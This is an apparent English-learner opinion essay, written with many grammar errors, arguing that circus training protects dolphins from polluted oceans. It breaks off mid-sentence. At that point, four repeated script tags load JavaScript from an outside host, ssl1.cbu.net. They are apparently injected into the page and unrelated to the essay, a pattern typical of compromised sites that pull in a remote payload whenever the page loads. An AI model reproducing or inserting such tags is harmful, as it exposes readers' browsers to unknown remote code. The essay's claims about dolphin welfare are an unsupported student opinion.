Many people are against training dolphins to perform in the circus because it may injure these animals. Do you agree or disagree? Why?

Many people are against training dolphins to perform in the circus because it may injure these animals. I disagree with this opinion. I think, training dolphins to perform in the circus is a good idea because we can protect them. Nowadays, some of ocean is polluted so the dolphins's life is affected. If they continue to live in there, they could die. Taking dolphins to the circus is make a new life for them. In the circus, although they were not free with the sea, they could receive the care anh love from the coach. The coaches knew how to train and make they not hurt. Then, the dolphins will become the famous circus performers. They will be received the love from everyone and people are proud of them. The dolphins, which is the symbol of the ocean and also a friend of people<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>